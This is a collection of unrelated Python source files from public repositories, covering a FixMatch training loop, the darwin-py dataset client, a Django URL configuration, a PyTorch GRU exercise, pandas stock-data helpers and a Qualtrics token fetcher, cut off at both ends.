losses_t/(batch_idx+1),\n 'Labeled_loss':losses_x/(batch_idx+1),\n 'Unlabeled_loss':losses_u/(batch_idx+1),\n 'Mask probs': mask_probs/(batch_idx+1)\n }, global_step=epoch*self.args.batch_size+batch_idx\n )\n\n pbar.set_description(\n '[Train(%4d/ %4d)-Total: %.3f|Labeled: %.3f|Unlabeled: %.3f]'%(\n (batch_idx+1), self.args.eval_step,\n losses_t/(batch_idx+1), losses_x/(batch_idx+1), losses_u/(batch_idx+1)\n )\n )\n pbar.update(1)\n\n pbar.set_description(\n '[Train(%4d/ %4d)-Total: %.3f|Labeled: %.3f|Unlabeled: %.3f]'%(\n epoch, self.args.epochs,\n losses_t/(batch_idx+1), losses_x/(batch_idx+1), losses_u/(batch_idx+1)\n )\n )\n return losses_t/(batch_idx+1), losses_x/(batch_idx+1), losses_u/(batch_idx+1)\n\n \n @torch.no_grad()\n def validate(self, epoch, phase):\n if phase == 'Train': ### Train Loss\n data_loader = self.labeled_loader\n c = 'blue'\n elif phase == 'Valid': ### Valid Loss\n data_loader = self.val_loader\n c = 'green'\n elif phase == 'Test ': ### Test Loss\n data_loader = self.test_loader\n c = 'red'\n \n losses = 0.0\n top1s, top5s = [], []\n \n with tqdm(**get_tqdm_config(total=len(data_loader),\n leave=True, color=c)) as pbar:\n for batch_idx, (inputs, targets) in enumerate(data_loader):\n inputs, targets = inputs.to(self.args.cuda), targets.to(self.args.cuda)\n targets = targets.type(torch.LongTensor).to(self.args.cuda)\n \n outputs = self.ema_model.ema(inputs)\n loss = self.criterion(outputs, targets)\n\n prec1, prec5 = accuracy(outputs, targets, topk=(1, 5))\n losses += loss.item()\n top1s.append(prec1)\n top5s.append(prec5)\n\n self.writer.add_scalars(\n f'{phase} steps', {\n 'Total_loss': losses/(batch_idx+1),\n 'Top1 Acc': np.mean(top1s),\n 'Top5 Acc': np.mean(top5s)\n }, global_step=epoch*self.args.batch_size+batch_idx\n )\n\n pbar.set_description(\n '[%s-Loss: %.3f|Top1 Acc: %.3f|Top5 Acc: %.3f]'%(\n phase,\n losses/(batch_idx+1), np.mean(top1s), np.mean(top5s)\n )\n )\n pbar.update(1)\n\n pbar.set_description(\n '[%s(%4d/ %4d)-Loss: %.3f|Top1 Acc: %.3f|Top5 Acc: %.3f]'%(\n phase,\n epoch, self.args.epochs,\n losses/(batch_idx+1), np.mean(top1s), np.mean(top5s)\n )\n )\n\n return losses/(batch_idx+1), np.mean(top1s), np.mean(top5s) \n \n# Argument \ndef FixMatch_parser():\n parser = argparse.ArgumentParser()\n \n # method arguments\n parser.add_argument('--n-labeled', type=int, default=4000) # labeled data의 수\n parser.add_argument('--n-classes', type=int, default=10) # Class의 수\n parser.add_argument(\"--expand-labels\", action=\"store_true\", \n help=\"expand labels to fit eval steps\")\n\n # training hyperparameters\n parser.add_argument('--batch-size', type=int, default=64) # 배치 사이즈\n parser.add_argument('--total-steps', default=2**14, type=int) # iteration마다 Scheduler가 적용되기에, Epoch가 아닌, Total-step을 정의\n parser.add_argument('--eval-step', type=int, default=1024) # Evaluation Step의 수\n parser.add_argument('--lr', type=float, default=0.03) # Learning rate\n parser.add_argument('--weight-decay', type=float, default=5e-4) # Weight Decay 정도\n parser.add_argument('--nesterov', action='store_true', default=True) # Nesterov Momentum\n parser.add_argument('--warmup', type=float, default=0.0) # Warmup 정도\n\n parser.add_argument('--use-ema', action='store_true', default=True) # EMA 사용여부\n parser.add_argument('--ema-decay', type=float, default=0.999) # EMA에서 Decay 정도\n\n parser.add_argument('--mu', type=int, default=7) # Labeled data의 mu배를 Unlabeled 데이터의 개수로 정의하기 위한 함수 (근데 위 Trainer에서는 안 쓰임)\n parser.add_argument('--T', type=float, default=1.0) # Sharpening 함수에 들어가는 하이퍼 파라미터\n\n parser.add_argument('--threshold', type=float, default=0.95) # Pseudo-Labeling이 진행되는 Threshold 정의\n parser.add_argument('--lambda-u', type=float, default=1.0) # Loss 가중치 정도\n return parser\n\n\ndef main():\n \n parser = FixMatch_parser()\n args = parser.parse_args([])\n args.cuda = torch.device(\"cuda:0\")\n args.epochs = math.ceil(args.total_steps/args.eval_step)\n\n trainer = FixMatchTrainer(args)\n\n best_loss = np.inf\n losses, losses_x, losses_u = [], [], []\n \n train_losses, train_top1s, train_top5s = [], [], []\n val_losses, val_top1s, val_top5s = [], [], []\n test_losses, test_top1s, test_top5s = [], [], []\n results = {'loss': [], 'test_acc_top1': [], 'test_acc_top5': []}\n \n for epoch in range(1, args.epochs+1, 1):\n loss, loss_x, loss_u = trainer.train(epoch)\n losses.append(loss)\n losses_x.append(loss_x)\n losses_u.append(loss_u)\n\n loss, top1, top5 = trainer.validate(epoch, 'Train')\n train_losses.append(loss)\n train_top1s.append(top1)\n train_top5s.append(top5)\n\n loss, top1, top5 = trainer.validate(epoch, 'Valid')\n val_losses.append(loss)\n val_top1s.append(top1)\n val_top5s.append(top5)\n \n results['loss'].append(loss)\n results['test_acc_top1'].append(top1)\n results['test_acc_top5'].append(top5)\n \n data_frame = pd.DataFrame(data=results, index=range(1, epoch + 1))\n savepath = 'results/fixmatch'\n os.makedirs(savepath, exist_ok=True)\n data_frame.to_csv(os.path.join(savepath,'statistics.csv'), index_label='epoch')\n\n if loss < best_loss:\n best_loss = loss\n torch.save(trainer.model, os.path.join(trainer.experiment_dir, 'model.pth'))\n torch.save(trainer.ema_model, os.path.join(trainer.experiment_dir, 'ema_model.pth'))\n\n loss, top1, top5 = trainer.validate(epoch, 'Test ')\n test_losses.append(loss)\n test_top1s.append(top1)\n test_top5s.append(top5)\n\n torch.save(trainer.model, os.path.join(trainer.experiment_dir, 'checkpooint_model.pth'))\n torch.save(trainer.ema_model, os.path.join(trainer.experiment_dir, 'checkpoint_ema_model.pth'))\n \nif __name__==\"__main__\":\n main()","repo_name":"goeunchae/Business-Analytics_5","sub_path":"fixmatch.py","file_name":"fixmatch.py","file_ext":"py","file_size_in_byte":23480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13959290812","text":"import itertools\nfrom typing import TYPE_CHECKING, Any, Dict, Iterator, List, Optional, Sequence, Union\n\nfrom requests.models import Response\n\nfrom darwin.dataset.release import Release\nfrom darwin.dataset.upload_manager import (\n FileUploadCallback,\n LocalFile,\n ProgressCallback,\n UploadHandler,\n UploadHandlerV1,\n)\nfrom darwin.dataset.utils import is_relative_to\nfrom darwin.datatypes import ItemId, PathLike\nfrom darwin.exceptions import NotFound, ValidationError\nfrom darwin.item import DatasetItem\nfrom darwin.item_sorter import ItemSorter\nfrom darwin.utils import find_files, urljoin\n\nif TYPE_CHECKING:\n from darwin.client import Client\n\nfrom darwin.dataset import RemoteDataset\n\n\nclass RemoteDatasetV1(RemoteDataset):\n \"\"\"\n Manages the remote and local versions of a dataset hosted on Darwin.\n It allows several dataset management operations such as syncing between\n remote and local, pulling a remote dataset, removing the local files, ...\n\n Parameters\n ----------\n client : Client\n Client to use for interaction with the server.\n team : str\n Team the dataset belongs to.\n name : str\n Name of the datasets as originally displayed on Darwin.\n It may contain white spaces, capital letters and special characters, e.g. `Bird Species!`.\n slug : str\n This is the dataset name with everything lower-case, removed specials characters and\n spaces are replaced by dashes, e.g., `bird-species`. This string is unique within a team.\n dataset_id : int\n Unique internal reference from the Darwin backend.\n item_count : int, default: 0\n Dataset size (number of items).\n progress : float, default: 0\n How much of the dataset has been annotated 0.0 to 1.0 (1.0 == 100%).\n\n Attributes\n ----------\n client : Client\n Client to use for interaction with the server.\n team : str\n Team the dataset belongs to.\n name : str\n Name of the datasets as originally displayed on Darwin.\n It may contain white spaces, capital letters and special characters, e.g. `Bird Species!`.\n slug : str\n This is the dataset name with everything lower-case, removed specials characters and\n spaces are replaced by dashes, e.g., `bird-species`. This string is unique within a team.\n dataset_id : int\n Unique internal reference from the Darwin backend.\n item_count : int, default: 0\n Dataset size (number of items).\n progress : float, default: 0\n How much of the dataset has been annotated 0.0 to 1.0 (1.0 == 100%).\n \"\"\"\n\n def __init__(\n self,\n *,\n client: \"Client\",\n team: str,\n name: str,\n slug: str,\n dataset_id: int,\n item_count: int = 0,\n progress: float = 0,\n ):\n super().__init__(\n client=client,\n team=team,\n name=name,\n slug=slug,\n dataset_id=dataset_id,\n item_count=item_count,\n progress=progress,\n )\n\n def get_releases(self) -> List[\"Release\"]:\n \"\"\"\n Get a sorted list of releases with the most recent first.\n\n Returns\n -------\n List[\"Release\"]\n Returns a sorted list of available ``Release``\\\\s with the most recent first.\n \"\"\"\n try:\n releases_json: List[Dict[str, Any]] = self.client.get_exports(\n self.dataset_id, self.team\n )\n except NotFound:\n return []\n\n releases = [\n Release.parse_json(self.slug, self.team, payload)\n for payload in releases_json\n ]\n return sorted(\n filter(lambda x: x.available, releases),\n key=lambda x: x.version,\n reverse=True,\n )\n\n def push(\n self,\n files_to_upload: Optional[Sequence[Union[PathLike, LocalFile]]],\n *,\n blocking: bool = True,\n multi_threaded: bool = True,\n max_workers: Optional[int] = None,\n fps: int = 0,\n as_frames: bool = False,\n extract_views: bool = False,\n files_to_exclude: Optional[List[PathLike]] = None,\n path: Optional[str] = None,\n preserve_folders: bool = False,\n progress_callback: Optional[ProgressCallback] = None,\n file_upload_callback: Optional[FileUploadCallback] = None,\n ) -> UploadHandler:\n \"\"\"\n Uploads a local dataset (images ONLY) in the datasets directory.\n\n Parameters\n ----------\n files_to_upload : Optional[List[Union[PathLike, LocalFile]]]\n List of files to upload. Those can be folders.\n blocking : bool, default: True\n If False, the dataset is not uploaded and a generator function is returned instead.\n multi_threaded : bool, default: True\n Uses multiprocessing to upload the dataset in parallel.\n If blocking is False this has no effect.\n max_workers : int, default: None\n Maximum number of workers to use for parallel upload.\n fps : int, default: 0\n When the uploading file is a video, specify its framerate.\n as_frames: bool, default: False\n When the uploading file is a video, specify whether it's going to be uploaded as a list of frames.\n files_to_exclude : Optional[PathLike]], default: None\n Optional list of files to exclude from the file scan. Those can be folders.\n path: Optional[str], default: None\n Optional path to store the files in.\n preserve_folders : bool, default: False\n Specify whether or not to preserve folder paths when uploading\n progress_callback: Optional[ProgressCallback], default: None\n Optional callback, called every time the progress of an uploading files is reported.\n file_upload_callback: Optional[FileUploadCallback], default: None\n Optional callback, called every time a file chunk is uploaded.\n\n Returns\n -------\n handler : UploadHandler\n Class for handling uploads, progress and error messages.\n\n Raises\n ------\n ValueError\n - If ``files_to_upload`` is ``None``.\n - If a path is specified when uploading a LocalFile object.\n - If there are no files to upload (because path is wrong or the exclude filter excludes everything).\n \"\"\"\n\n if files_to_exclude is None:\n files_to_exclude = []\n\n if files_to_upload is None:\n raise ValueError(\"No files or directory specified.\")\n\n uploading_files = [\n item for item in files_to_upload if isinstance(item, LocalFile)\n ]\n search_files = [\n item for item in files_to_upload if not isinstance(item, LocalFile)\n ]\n\n generic_parameters_specified = (\n path is not None or fps != 0 or as_frames is not False\n )\n if uploading_files and generic_parameters_specified:\n raise ValueError(\"Cannot specify a path when uploading a LocalFile object.\")\n\n for found_file in find_files(search_files, files_to_exclude=files_to_exclude):\n local_path = path\n if preserve_folders:\n source_files = [\n source_file\n for source_file in search_files\n if is_relative_to(found_file, source_file)\n ]\n if source_files:\n local_path = str(found_file.relative_to(source_files[0]).parent)\n uploading_files.append(\n LocalFile(found_file, fps=fps, as_frames=as_frames, path=local_path)\n )\n\n if not uploading_files:\n raise ValueError(\n \"No files to upload, check your path, exclusion filters and resume flag\"\n )\n\n handler = UploadHandlerV1(self, uploading_files)\n if blocking:\n handler.upload(\n max_workers=max_workers,\n multi_threaded=multi_threaded,\n progress_callback=progress_callback,\n file_upload_callback=file_upload_callback,\n )\n else:\n handler.prepare_upload()\n\n return handler\n\n def fetch_remote_files(\n self,\n filters: Optional[Dict[str, Union[str, List[str]]]] = None,\n sort: Optional[Union[str, ItemSorter]] = None,\n ) -> Iterator[DatasetItem]:\n \"\"\"\n Fetch and lists all files on the remote dataset.\n\n Parameters\n ----------\n filters : Optional[Dict[str, Union[str, List[str]]]], default: None\n The filters to use. Files excluded by the filter won't be fetched.\n sort : Optional[Union[str, ItemSorter]], default: None\n A sorting direction. It can be a string with the values 'asc', 'ascending', 'desc',\n 'descending' or an ``ItemSorter`` instance.\n\n Yields\n -------\n Iterator[DatasetItem]\n An iterator of ``DatasetItem``.\n \"\"\"\n post_filters: Dict[str, Union[str, List[str]]] = {}\n post_sort: Dict[str, str] = {}\n\n if filters:\n for list_type in [\"filenames\", \"statuses\"]:\n if list_type in filters:\n if type(filters[list_type]) is list:\n post_filters[list_type] = filters[list_type]\n else:\n post_filters[list_type] = str(filters[list_type])\n if \"path\" in filters:\n post_filters[\"path\"] = str(filters[\"path\"])\n if \"item_ids\" in filters:\n post_filters[\"dataset_item_ids\"] = filters[\"item_ids\"]\n if \"types\" in filters:\n post_filters[\"types\"] = str(filters[\"types\"])\n\n if sort:\n item_sorter = ItemSorter.parse(sort)\n post_sort[item_sorter.field] = item_sorter.direction.value\n cursor = {\"page[size]\": 500}\n while True:\n payload = {\"filter\": post_filters, \"sort\": post_sort}\n response = self.client.fetch_remote_files(\n self.dataset_id, cursor, payload, self.team\n )\n\n yield from [DatasetItem.parse(item) for item in response[\"items\"]]\n\n if response[\"metadata\"][\"next\"]:\n cursor[\"page[from]\"] = response[\"metadata\"][\"next\"]\n else:\n return\n\n def archive(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Archives (soft-deletion) the given ``DatasetItem``\\\\s belonging to this ``RemoteDataset``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be archived.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.archive_item(self.slug, self.team, payload)\n\n def restore_archived(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Restores the archived ``DatasetItem``\\\\s that belong to this ``RemoteDataset``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be restored.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.restore_archived_item(self.slug, self.team, payload)\n\n def move_to_new(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Changes the given ``DatasetItem``\\\\s status to ``new``.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s whose status will change.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.move_item_to_new(self.slug, self.team, payload)\n\n def reset(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Resets the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be resetted.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.reset_item(self.slug, self.team, payload)\n\n def complete(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Completes the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be completed.\n \"\"\"\n\n def wf_template_id_mapper(item):\n return item.current_workflow[\"workflow_template_id\"]\n\n input_items: List[DatasetItem] = list(items)\n\n # We split into items with and without workflow\n items_wf = filter(lambda item: item.current_workflow, input_items)\n items_no_wf = filter(lambda item: item.current_workflow is None, input_items)\n\n # All items without workflow get instantiated\n items_instantiated: List[DatasetItem] = []\n for old_item in items_no_wf:\n (_, item) = self.client.instantiate_item(old_item.id, include_metadata=True)\n items_instantiated.append(item)\n\n # We create new list of items from instantiated items and other items with workflow\n # We also group them by workflow_template_id, because we can't do batch across diff templates\n items = sorted([*items_wf, *items_instantiated], key=wf_template_id_mapper)\n items_by_wf_template = itertools.groupby(\n items,\n key=wf_template_id_mapper,\n )\n\n # For each WF template, we find complete stage template id\n # and try to set stage for all items in this workflow\n for wf_template_id, current_items in items_by_wf_template:\n current_items = list(current_items)\n sample_item = current_items[0]\n deep_sample_stages = sample_item.current_workflow[\"stages\"].values()\n sample_stages = [item for sublist in deep_sample_stages for item in sublist]\n complete_stage = list(\n filter(lambda stage: stage[\"type\"] == \"complete\", sample_stages)\n )[0]\n\n filters = {\"dataset_item_ids\": [item.id for item in current_items]}\n try:\n self.client.move_to_stage(\n self.slug,\n self.team,\n filters,\n complete_stage[\"workflow_stage_template_id\"],\n )\n except ValidationError:\n raise ValueError(\n \"Unable to complete some of provided items. Make sure to assign them to a user first.\"\n )\n\n def delete_items(self, items: Iterator[DatasetItem]) -> None:\n \"\"\"\n Deletes the given ``DatasetItem``\\\\s.\n\n Parameters\n ----------\n items : Iterator[DatasetItem]\n The ``DatasetItem``\\\\s to be deleted.\n \"\"\"\n payload: Dict[str, Any] = {\n \"filter\": {\"dataset_item_ids\": [item.id for item in items]}\n }\n self.client.delete_item(self.slug, self.team, payload)\n\n def export(\n self,\n name: str,\n annotation_class_ids: Optional[List[str]] = None,\n include_url_token: bool = False,\n include_authorship: bool = False,\n version: Optional[str] = None,\n ) -> None:\n \"\"\"\n Create a new release for this ``RemoteDataset``.\n\n Parameters\n ----------\n name : str\n Name of the release.\n annotation_class_ids : Optional[List[str]], default: None\n List of the classes to filter.\n include_url_token : bool, default: False\n Should the image url in the export include a token enabling access without team\n membership or not?\n include_authorship : bool, default: False\n If set, include annotator and reviewer metadata for each annotation.\n version : Optional[str], default: None, enum: [\"1.0\", \"2.0\"]\n When used for V2 dataset, allows to force generation of either Darwin JSON 1.0 (Legacy) or newer 2.0.\n Omit this option to get your team's default.\n \"\"\"\n if annotation_class_ids is None:\n annotation_class_ids = []\n\n payload = {\n \"annotation_class_ids\": annotation_class_ids,\n \"name\": name,\n \"include_export_token\": include_url_token,\n \"include_authorship\": include_authorship,\n }\n self.client.create_export(self.dataset_id, payload, self.team)\n\n def get_report(self, granularity: str = \"day\") -> str:\n \"\"\"\n Returns a String representation of a CSV report for this ``RemoteDataset``.\n\n Parameters\n ----------\n granularity : str, default: \"day\"\n The granularity of the report, can be 'day', 'week' or 'month'.\n\n Returns\n -------\n str\n A CSV report.\n \"\"\"\n response: Response = self.client.get_report(\n self.dataset_id, granularity, self.team\n )\n return response.text\n\n def workview_url_for_item(self, item: DatasetItem) -> str:\n \"\"\"\n Returns the darwin URL for the given ``DatasetItem``.\n\n Parameters\n ----------\n item : DatasetItem\n The ``DatasetItem`` for which we want the url.\n\n Returns\n -------\n str\n The url.\n \"\"\"\n return urljoin(\n self.client.base_url,\n f\"/workview?dataset={self.dataset_id}&image={item.seq}\",\n )\n\n def post_comment(\n self, item: DatasetItem, text: str, x: float, y: float, w: float, h: float\n ):\n \"\"\"\n Adds a comment to an item in this dataset\n Instantiates a workflow if needed\n \"\"\"\n maybe_workflow_id: Optional[int] = item.current_workflow_id\n\n if maybe_workflow_id is None:\n workflow_id: int = self.client.instantiate_item(item.id)\n else:\n workflow_id = maybe_workflow_id\n\n self.client.post_workflow_comment(workflow_id, text, x, y, w, h)\n\n def import_annotation(self, item_id: ItemId, payload: Dict[str, Any]) -> None:\n \"\"\"\n Imports the annotation for the item with the given id.\n\n Parameters\n ----------\n item_id: ItemId\n Identifier of the Image or Video that we are import the annotation to.\n payload: Dict[str, Any]\n A dictionary with the annotation to import. The default format is:\n `{\"annotations\": serialized_annotations, \"overwrite\": \"false\"}`\n \"\"\"\n\n self.client.import_annotation(item_id, payload=payload)\n","repo_name":"v7labs/darwin-py","sub_path":"darwin/dataset/remote_dataset_v1.py","file_name":"remote_dataset_v1.py","file_ext":"py","file_size_in_byte":18788,"program_lang":"python","lang":"en","doc_type":"code","stars":112,"dataset":"github-code","pt":"50"} +{"seq_id":"17667837867","text":"\"\"\"djingleshop URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nfrom djingleshop_shopping.views import IndexView, AddProductView, add_item_to_cart, remove_item_from_cart, get_cart_items_list, search_for_products, get_products\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', IndexView.as_view(), name=\"main-page\"),\n path('manage/addproduct/', AddProductView.as_view(), name=\"add-product\"),\n path('manage/addcartitem/', add_item_to_cart, name=\"add_cart_item\"),\n path('manage/removecartitem/', remove_item_from_cart, name=\"remove_cart_item\"),\n path('getcartitems/', get_cart_items_list, name=\"get_cart_items\"),\n path('search', search_for_products, name=\"search_for_products\"),\n path('getproducts', get_products, name=\"get_products_list\")\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"JalonDodson/djingleshop","sub_path":"djingleshop/djingleshop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"70583571035","text":"# instead of going point by point, use the batch approach\n# (you need to get used to it anyway eventually)\n\nimport torch.nn as nn\nimport torch\nfrom torchviz import make_dot\nfrom torch import optim\n\nimport logging\nlogging.basicConfig(format='%(asctime)s - %(message)s', level=logging.DEBUG)\n\nimport pickle\nwith open('random_data.pickle', 'rb') as inf:\n d = pickle.load(inf)\n\npoints, directions = d['points'], d['directions']\ntest_points, test_directions = d['test_points'], d['test_directions']\n\n\n\n### Parsing\nimport argparse\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-v', action='store_true')\nparser.add_argument('-N', type=int, default=1000000)\nparser.add_argument('-E', type=int, default=100)\n\n\n# Parse the command line arguments.\nargs = parser.parse_args()\n\n# Get the value of the \"-v\" argument.\nVERBOSE = args.v\nEPOCH = args.E\nDATA_SIZE = args.N\n\n\n### RNN\ntorch.manual_seed(17)\ntorch.set_default_dtype(torch.float64)\n\nn_features = 2\nhidden_dim = 2\n\n# NOTE!! This is not rnn_cell but RNN!!!\nrnn_whole = nn.GRU(n_features, hidden_dim)\nrnn_state = rnn_whole.state_dict()\nprint(\"RNN coefficients\\n\", rnn_state)\n\n## Don't touch the classifier, our focus is on RNN rather than classifier\nclassifier = nn.Linear(hidden_dim, 1)\nclassifier.weight.data = torch.tensor([[-0.2732, -0.1587]], dtype=torch.float64)\nclassifier.bias.data = torch.tensor([0.5806], dtype=torch.float64)\n# ALWAYS CHECK DEFAULT WEIGHTS. THEY MIGHT CHANGE AFTER YOU CHANGE DATA TYPES\nprint('classifier coefficients\\n', classifier.state_dict())\n\n# loss = nn.BCELoss() # expects number from 0 to 1\nloss = nn.BCEWithLogitsLoss() # just sigmod with BCELoss\n\noptimizer = optim.Adam(list(rnn_whole.parameters()) + list(classifier.parameters()), lr=0.01)\n\n\n# To use the batch approach, points and directions needs to be tensors\npoints = torch.tensor(points, dtype=torch.float64)\ndirections = torch.tensor(directions, dtype=torch.float64)\n\nif VERBOSE:\n print(points.shape) # (3 points, 4 rows/point, 2 features per row )\n print(directions.shape) # (3 points)\n\n# NOTE: !! You can't just feed (3, 4, 2) into the RNN!!\n# It will think you have 4 points, each with 3 rows and 2 features!!\n#\n# For the GRU (and most other RNNs in PyTorch), the expected input shape is (seq_len, batch_size, input_size). The output shapes are as follows:\n#\n# output of shape (seq_len, batch_size, num_directions * hidden_size)\n# hidden of shape (num_layers * num_directions, batch_size, hidden_size)\n# In your case:\n#\n# seq_len is 4 (since each point has 4 rows)\n# batch_size is 3 (since you input 3 points)\n# input_size is 2 (as each row has 2 features)\n# hidden_size is 2 (as defined by hidden_dim)\n# Therefore, you should expect output to have the shape (4, 3, 2) and hidden to have the shape (1, 3, 2) (since you're using a single-layer unidirectional GRU).\n#\n# Change from (batch_size, seq_len, input_size) to (seq_len, batch_size, input_size)\npoints = points.transpose(0, 1)\n\n\npoints, directions = points[:DATA_SIZE], directions[:DATA_SIZE]\n\nfor epoch in range(EPOCH):\n\n ###################### Y_hat ######################\n classifier_outputs = []\n\n # Now instead of feeding point by point, we will by using it as a batch\n output, hidden = rnn_whole(points)\n\n # we want to classify on the HIDDEN\n\n # We will feed the last \"out\" to the classifier\n if VERBOSE:\n print('What are we feeding into the classifier?', hidden)\n temp = classifier(hidden)\n if VERBOSE:\n print('What comes out from the classifier?', temp)\n\n classifier_outputs.append(temp)\n\n ###################### end of Y_hat ######################\n\n # Convert [ tensor, .. ] to tensor([float, ...])\n # print(\"Classifier (Before)\", classifier_outputs)\n classifier_outputs_tensor = torch.cat(classifier_outputs).view(-1).to(torch.float64)\n if VERBOSE:\n print(\"Classifier (After)\", classifier_outputs_tensor)\n\n # Convert directions numpy array to a PyTorch tensor\n # print(\"Directions (Before)\", directions)\n directions_tensor = torch.tensor(directions, dtype=torch.float64)\n # print(\"Directions (After)\", directions_tensor)\n\n # Now we need to compute loss\n training_loss = loss(classifier_outputs_tensor, directions_tensor)\n print(f\"Epoch:{epoch}, training_loss:{training_loss.data}\")\n\n training_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n\n\n","repo_name":"freezetreat/learning","sub_path":"rewrite/8/GRU/1_batched.py","file_name":"1_batched.py","file_ext":"py","file_size_in_byte":4395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"22354848142","text":"import pandas as pd \r\nimport matplotlib.pyplot as plt \r\n\r\ndef import_data(file, print_head = False):\r\n\tdf = pd.read_csv('data/{}.csv'.format(file))\r\n\tprint(file)\r\n\tif print_head == True:\r\n\t\tprint(\"First few values:\")\r\n\t\tprint(df.head())\r\n\treturn df\r\n\r\ndef import_data_date_index(file, print_head = False):\r\n\tdf = pd.read_csv('data/{}.csv'.format(file), index_col = \"Date\", parse_dates = True)\r\n\tprint(file)\r\n\tif print_head == True:\r\n\t\tprint(\"First few values:\")\r\n\t\tprint(df.head())\r\n\treturn df\r\n\r\ndef import_data_date_index_one_col(file, print_head = False):\r\n\tdf = pd.read_csv('data/{}.csv'.format(file), \r\n\t\tindex_col = 'Date', \r\n\t\tparse_dates = True, \r\n\t\tusecols = ['Date', 'Adj Close'],\r\n\t\tna_values = ['nan']\r\n\t\t)\r\n\tprint(file)\r\n\tif print_head == True:\r\n\t\tprint(\"First few values:\")\r\n\t\tprint(df.head())\r\n\treturn df\r\n\r\ndef print_max_close(df):\r\n\tclose_prices = df['Volume']\r\n\tmax_close = close_prices.max()\r\n\tprint(max_close)\r\n\r\ndef print_mean_volume(df):\r\n\tvolume = df['Volume']\r\n\tmean_volume = volume.mean()\r\n\tprint(mean_volume)\r\n\r\ndef plot_adj_close(df):\r\n\tdf['Adj Close'].plot()\r\n\tplt.show()\r\n\r\ndef plot_high_price(df):\r\n\tdf['High'].plot()\r\n\tplt.show()\r\ndef plot_two_columns(df):\r\n\tdf[['High', 'Adj Close']].plot()\r\n\tplt.show()\r\n\r\ndef creating_empty_df():\r\n\tstart_date = '2010-01-22'\r\n\tend_date = '2010-01-26'\r\n\tdates = pd.date_range(start_date, end_date) # datetime index object / \r\n\t# Creating an empty DataFrame\r\n\t# if not using index = the indexes will be from zero to ...\r\n\tdf1 = pd.DataFrame(index = dates) \r\n\treturn df1\r\n\r\ndef join_dataframes(df_1, df_2):\r\n\tdf_1 = df_1.join(df_2)\r\n\treturn df_1\r\n\r\ndef drop_nan(df):\r\n\tdf = df.dropna() # Dropping NaN values\r\n\treturn df\r\n\r\nif __name__ == '__main__':\r\n\tfor company in [\"SPY\"]:\r\n\t\tdf = import_data_date_index_one_col(company)\r\n\t\tdf1 = creating_empty_df()\r\n\t\ttwo_df = join_dataframes(df1, df)\r\n\t\ttwo_df = drop_nan(two_df)\r\n\t\tprint (two_df)\r\nprint(\"DONE!\")","repo_name":"theoneandonlywoj/Machine-Learning-For-Trading","sub_path":"08_joining_two_df.py","file_name":"08_joining_two_df.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"50"} +{"seq_id":"24363428021","text":"__author__ = 'jwpully'\nimport requests\n\ndef gettoken(clientId, clientSecret, dataCenter):\n\n try:\n baseUrl = \"https://{0}.qualtrics.com/oauth2/token\".format(dataCenter)\n data = { \"grant_type\": \"client_credentials\" }\n\n r = requests.post(baseUrl, auth=(clientId, clientSecret), data=data)\n\n return r.json()['access_token']\n except Exception as e:\n print(\"An error occurred while getting the Qualtrics Token\")\n print(str(e))\n exit(1)\n\n\nif __name__ == \"__main__\":\n from configmanager import settings\n\n try:\n settings = settings()\n bearerToken = gettoken(settings['QUALTRICS_CLIENTID'], settings['QUALTRICS_SECRET'], settings['QUALTRICS_DATACENTER'])\n print(\"Next command, execute:\")\n print(\"python generateexport.py --bearerToken \" + bearerToken)\n except Exception as e:\n print(\"An error occurred while running gettoken\")\n print(str(e))","repo_name":"WMInfoTech/continuous-qualtrics-exporter","sub_path":"app/lib/gettoken.py","file_name":"gettoken.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9775122316","text":"import sys\n\nfrom .tool import Tool\nfrom amitools.vamos.astructs import AmigaStructTypes, TypeDumper\nfrom amitools.vamos.cfgcore import parse_scalar\n\n\nclass TypeTool(Tool):\n def __init__(self):\n Tool.__init__(self, 